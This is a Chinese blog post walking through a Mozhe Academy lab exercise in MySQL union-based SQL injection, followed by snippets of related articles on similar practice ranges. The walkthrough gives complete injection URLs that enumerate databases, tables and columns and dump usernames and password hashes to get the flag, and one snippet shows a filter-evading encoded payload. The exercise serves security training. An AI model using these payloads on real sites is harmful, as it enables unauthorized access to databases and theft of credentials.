墨者学院MySQL--sql注入靶场

最新推荐文章于 2025-07-28 18:33:48 发布
最新推荐文章于 2025-07-28 18:33:48 发布
阅读量1.6k 收藏 7
点赞数 2
CC 4.0 BY-SA版权
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43803070/article/details/95042067
本文详细记录了一次SQL注入攻击过程,从发现注入点到利用SQL注入获取关键信息,包括数据库名、表名、列名及数据,展示了如何通过SQL注入爆破获取flag。

这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp:

首先找注入点:

http://219.153.49.228:40084/new_list.php?id=1‘//
 id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。

http://219.153.49.228:40084/new_list.php?id=1%20and%201=1--+ //页面返回正常  注意id=1不加单引号。

判断回显字段有多少:

http://219.153.49.228:40084/new_list.php?id=1%20order%20by%204--+  //返回正常

http://219.153.49.228:40084/new_list.php?id=1%20order%20by%205--+ //返回错误

说明页面有4个回显字段。

显示回显字段:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,3,4--+

在这里插入图片描述

在回显字段上爆出相应信息:
爆出数据库

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,group_concat(schema_name),4%20from%20information_schema.schemata--+

在这里插入图片描述
这里不得不吐槽一下,数据库名字给的不明显,导致我一开始尝试了好多个数据库也没有找到flag。
这里选择第二个数据库。
爆出表:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20%20where%20%20%20table_schema=%22mozhe_Discuz_StormGroup%22--+

在这里插入图片描述

爆出列:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20%20where%20%20%20table_name=%22StormGroup_member%22--+

爆出字段:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,concat(0x7e,name,0x7e,password,0x7e,status),4%20from%20StormGroup_member--+

在这里插入图片描述

爆出了密码,但是这个密码是错误的,不知道为啥。

既然密码不对肯定有别的密码,我们加一个limit 0,1

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,concat(0x7e,name,0x7e,password,0x7e,status),4%20from%20StormGroup_member%20%20limit%200,1--+

limit1,1:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,concat(0x7e,name,0x7e,password,0x7e,status),4%20from%20StormGroup_member%20%20limit%200,1--+

在这里插入图片描述

对结果进行md5解密得到登陆密码,拿到key。
在这里插入图片描述

在这里强调一下,不要随便复制别人的flag,flag值都随机的,最后我们在爆出最终的密码的时候,我们爆出第一个但是不好使,这时候我们应该联想到limit,爆出其他的flag。
其实我们在最后爆出flag的时候可以用以下语句:

http://219.153.49.228:40084/new_list.php?id=-1%20%20union%20select%201,2,group_concat(password),4%20from%20StormGroup_member%20%20--+

加入一个group——concat(),进而不用limit限制,这里此函数的用法自行百度。
如图:
在这里插入图片描述

靶场——SQL注入
newqian的博客
08-06 2016
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(其原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4123
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
sql注入靶场_sql注入
weixin_26705651的博客
09-21 1054
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
墨者SQL注入实战-MySQL
最新发布
qq_62000508的博客
07-28 784
本文介绍了MySQL环境下Base64编码的SQL注入实战方法。主要内容包括:1)手工注入步骤,通过Base64编码SQL语句逐步获取数据库信息;2)使用sqlmap工具配合--tamper=base64encode参数自动化检测;3)关键参数说明和在线编码工具推荐。文章详细演示了从判断字段数到最终获取敏感数据的完整流程,强调该方法仅用于安全学习,严禁非法测试。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1854
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
sql注入靶场
weixin_44382333的博客
09-22 240
盲注: updatexml()函数的理解(图床的设置)
墨者靶场mysql注入_靶场练习-墨者学院-sql注入-'X-Forwarded-For' 字段注入
weixin_39926193的博客
02-05 272
X-Forwarded-For知识点:X-Forwarded-For 是一个 HTTP 扩展头部。X-Forwarded-For 请求头格式:X-Forwarded-For:client,proxy1,proxy2X-Forwarded-For: client, proxy1, proxy2如果一个 HTTP 请求到达服务器之前,经过了三个代理 Proxy1、Proxy2、Proxy3,IP 分别...
墨者学院SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 1034
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2715
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
墨者学院(4个sql靶场攻略)
2201_75891821的博客
07-22 1987
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 506
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院--手工注入mysql数据库实例
Louisnie
10-16 1195
开启墨者靶场环境,发现此界面,在点击登陆下方的通知之后惊奇的看到存在参数id,可以试试通过传递SQL语句获取数据库信息. 我们可以试试1=1和1=2大法,输入在参数id=1后面加入1=1进行逻辑判断 显示正常,然后换1=2,因为1=2为一个假命题,如果能插入到数据库进行逻辑判断,那么由于该语句错误,数据库查询不到任何信息,界面就不会显示任何信息 根据这种情况可以大概的判断出该网站很大可能存...
Pikachu靶场-SQL注入
sucker的博客
04-21 2230
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
墨者学院靶场
muqiyihan的博客
06-13 139
背景介绍:某单位IT运维人员,在服务器上留了一个页面用来ping内部服务器连通情况。安全工程师"墨者"检查发现这一文件存在漏洞,要求运维人员立刻下线。| linux的管道符 管道是一种通信机制,通常用于进程间的通信。ls 意思是查看文件夹,试探能不能看到系统的文件 发现有三个文件 以其中一个以K开头 应该是我需要的东西。在我尝试其他命令时发现把CAT和K中间的空格去掉后数字变红了 尝试发送发现还是不行。到这里应该想到是把空格进行了过滤 下面就应该尝试替换空格。使用Linux命令 | 尝试查看。
SQL注入--靶场练习
wmr123456001的博客
02-11 2297
SQL注入靶场练习
墨者mysql注入_墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_39966644的博客
01-19 281
登录平台靶靶场后会发现底部有个通知点进去之后会发现URL中带有?id这地方八成是可以注入的先尝试了一下在tingjigonggao后面加'号结果发下报错了看这提示应该是sql语句错误然后尝试了下加上‘ and ’1‘=’1 结果回显是正常的,加上‘ and 1=1 报错说明这里是一个字符型的注入,当然这个靶场的题目也已经提示了这次的sql注入会是一个字符型注入接下来就是测试字段数了这里我一开始尝试...
SQL注入(php靶场为例)
qq_47632786的博客
02-07 552
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
iwebsec靶场sql注入
果粒程
02-24 1535
iwebsec靶场sql注入
SQL注入靶场攻击——sqli-labs
qq_67812668的博客
08-14 1437
概述SQL注入SQL Injection)是发生在web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库,也就是说,SQL注入就是在爱用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值